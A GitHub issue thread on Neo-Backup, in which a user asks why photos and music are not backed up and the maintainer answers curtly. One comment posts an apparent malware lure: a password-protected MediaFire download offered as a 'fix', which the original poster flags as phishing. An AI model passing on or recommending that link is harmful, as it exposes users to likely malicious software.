### ISSUE TITLE
[Feature Request] why does neobackup not backup photos, audio/music and other data??

### ISSUE THREAD

**Issue by reikred** [NeoApplications/Neo-Backup#901]
This is perhaps a combination of a feature request, and a asking for clarification how neobackup is supposed to work:

I bought a 2TB SSD USB and created a 1st partition of 350GB (exfat).  I have a rooted 1+-n10-5g with android11. I plugged in the SSD and ran neobackup. The result was baffling. Out of some 90GB  of various stuff on the phone, only about 11GB got backed up, and it seems it was all  apps and app data.

What about all the photos, music, audio, whatnot? Why is it not being backed up? Is there some setting I need to activate, or am I supposed to use some other program for photos (etc) backup?

Also, why does neobackup place all the app backups at the top level of the SSD? It creates massive clutter and makes it cumbersome to use the partition for anything else. Why can't there be a directory called neobackup to place the backups in? The clutter is just immense.

Also, the phone  itself seems to create a bunch of other directories at the top level as soon as the USB is plugged in (with names like Audio, Download, etc). More clutter, but I guess this is the fault of android and not the fault of neobackup. Is there a way to avoid this?

I know I'm being cranky here, but I just don't understand why backups are incomplete, cluttered and complicated. If neobackup only backs up apps, at least that should be prominently explained at the top of README.md.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by reikred** [comment]
The rickdoq post look pike a phising attempt to me.

**Comment by hg42** [comment]
> If neobackup only backs up apps, at least that should be prominently explained at the top of README.md.

looks like you cannot read...

The README says:
```
Now on functionality of our App:
    It requires root and allows you to backup individual apps and their data.
```
not sure what isn't clear about this...

There is no mention of doing everything for you including cooking coffee or similar.
And who are you to complain at all, that NB does not do what you want to have?
May be you should use a product you pay for...
